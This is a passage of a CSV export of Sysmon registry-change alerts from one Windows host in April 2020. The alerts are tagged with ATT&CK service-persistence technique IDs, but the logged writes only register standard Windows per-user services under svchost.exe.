service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.133029100Z"",""eventRecordID"":""596"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:54.406",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.131971000Z"",""eventRecordID"":""595"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\System32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\System32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3eb7b\ImagePath +Details: C:\Windows\System32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:49:54.373",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.131666100Z"",""eventRecordID"":""594"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:54.346",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.128542700Z"",""eventRecordID"":""593"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k PrintWorkflow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k PrintWorkflow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k PrintWorkflow""" +"Apr 24, 2020 @ 12:49:54.310",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.128309100Z"",""eventRecordID"":""592"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:54.296",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.127316800Z"",""eventRecordID"":""591"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:49:54.284",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.127076700Z"",""eventRecordID"":""590"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:54.264",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.126231100Z"",""eventRecordID"":""589"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:49:54.252",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.126016300Z"",""eventRecordID"":""588"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3eb7b\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 12:49:54.231",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.123674900Z"",""eventRecordID"":""587"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:49:54.217",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.123197400Z"",""eventRecordID"":""586"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:54.201",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.121634500Z"",""eventRecordID"":""585"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 12:49:54.187",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.120746300Z"",""eventRecordID"":""584"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:54.167",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.118775800Z"",""eventRecordID"":""583"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 12:49:54.144",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.118546900Z"",""eventRecordID"":""582"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3eb7b\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3eb7b\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3eb7b\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:54.131",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.117334400Z"",""eventRecordID"":""581"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 